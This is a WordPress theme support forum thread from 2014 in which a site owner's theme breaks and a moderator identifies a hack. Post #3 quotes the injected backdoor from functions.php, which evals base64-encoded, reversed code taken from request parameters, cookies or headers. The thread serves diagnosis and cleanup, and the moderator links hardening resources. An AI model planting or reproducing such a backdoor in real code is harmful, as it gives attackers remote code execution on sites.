Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme » New Versions, & Updating »

Sev 1 Issue with Old but Trusty WP 3.1 and Atahualpa 364


  #1  
Old Dec 4, 2014, 10:30 PM
fromtheranks
 
149 posts · Apr 2009
Dev Env't: XP Pro SP3, IIS 5.1, MySQL 5.1, PHP 5.2.x, WP 2.7.1, Atahualpa 3.3.3, IE 7, FF 3.0.x
Haven't been on the site for a while been really busy. Same reason for not doing any upgrades -- moving, new job, two major IT projects plus misc ...

Yesterday I went onto my site (www.fromtheranks.com) to retrieve a post on Testing 101 and found I couldn't access it, at all. I get the following error:

"Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /hermes/bosoraweb072/b1380/ipg.fromtherankscom/ftr-it/wp-content/themes/atahualpa364/functions.php on line 143"

It was working fine until, apparently, IPage did an upgrade of some sort and broke my site badly.

I touched base with them and they are taking zero responsibility for the problem blaming me and insisting I upgrade everything -- time for a new host I think. (Not a bad idea to upgrade but finding the time is impossible right now. Being an IT Guy I know better than to blame the customer. Bad form. Really bad form.)

Anyone have a fix for this? I looked at functions.php and it seems fine to me but then again I'm not a php guru.

Last edited by fromtheranks; Dec 4, 2014 at 10:33 PM.
  #2  
Old Dec 5, 2014, 02:52 AM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
My first suspicion is you have been hacked. What are the first three lines function.php
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #3  
Old Dec 5, 2014, 10:50 PM
fromtheranks
 
149 posts · Apr 2009
Dev Env't: XP Pro SP3, IIS 5.1, MySQL 5.1, PHP 5.2.x, WP 2.7.1, Atahualpa 3.3.3, IE 7, FF 3.0.x
Nice to hear from you again Juggledad. Thanks for picking this up. Here's the first three lines directly off my site:

<?php
$izland=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$azland=isset($izland["landingzz"])?$izland["landingzz"]isset($izland["HTTP_LANDINGZZ"])?$izland["HTTP_LANDINGZZ"]:"");
if ($azland!=""){eval(strrev(base64_decode(strrev($az land))));}
?><?php
$bfa_ata_version = "3.6.4";

Taking your hint, I assume this is what it should look like?

<?php
$bfa_ata_version = "3.6.4";
  #4  
Old Dec 5, 2014, 11:35 PM
fromtheranks
 
149 posts · Apr 2009
Dev Env't: XP Pro SP3, IIS 5.1, MySQL 5.1, PHP 5.2.x, WP 2.7.1, Atahualpa 3.3.3, IE 7, FF 3.0.x
That was it, it was altered. The three lines in the earlier reply, plus the ones below were indeed altered. For the life of me I can't think of what the point would be but my site is up again.
From:
// Escape single & double quotes
function bfa_escape($string) {
$string = str_replace('"', '"', $string); <-- the &#34 was deleted
$string = str_replace("'", ''', $string); <-- the &#39 was deleted
return $string;

Thanks for your help. No doubt I'll be needing more once I start walking through all the upgrade steps. Sigh.
  #5  
Old Dec 6, 2014, 03:57 AM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
bad news, you have been hacked. Those lines at the beginning of function.php are the evidence.

you need to plug the hack or you will get hacked again

You need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com...-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordp...erability.html
http://blog.sucuri.net/2010/07/under...wordpress.html
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #6  
Old Dec 9, 2014, 08:24 PM
fromtheranks
 
149 posts · Apr 2009
Dev Env't: XP Pro SP3, IIS 5.1, MySQL 5.1, PHP 5.2.x, WP 2.7.1, Atahualpa 3.3.3, IE 7, FF 3.0.x
Thank you Jugglehead. I guess this is what I'll be doing over my Christmas vacation.

Happy Holidays

Bookmarks

« Page title cannot be modified | [SOLVED] Restore from backup? »
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Linear Mode Linear Mode


Similar Threads
Thread Thread Starter Forum Replies Last Post
Issue with Supercharge atahualpa 1.4 and theme 3.7.7 Dalecox18 Excerpts, Read more, Pagination 3 Dec 2, 2012 06:27 AM
Another WP eCommerce issue with Atahualpa...ideas welcome! Inblingham eCommerce & Atahualpa 2 Jun 18, 2012 02:55 PM
if you are getting blank page with Atahualpa 3.6.x (Suhosin issue) lmilesw Old Version fixes and change logs 102 Sep 29, 2011 04:59 PM
[SOLVED] Issue installing atahualpa from WP repository Tim F New Versions, & Updating 3 Apr 7, 2010 01:39 PM
atahualpa 3.4.4 and wp logic issue. ramapoughnative Atahualpa 3 Wordpress theme 1 Jan 4, 2010 08:11 AM


All times are GMT -6. The time now is 02:08 PM.

Contact Us - Terms & Conditions - WordPress Themes Forum @ BFA - Privacy Statement - Top

Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.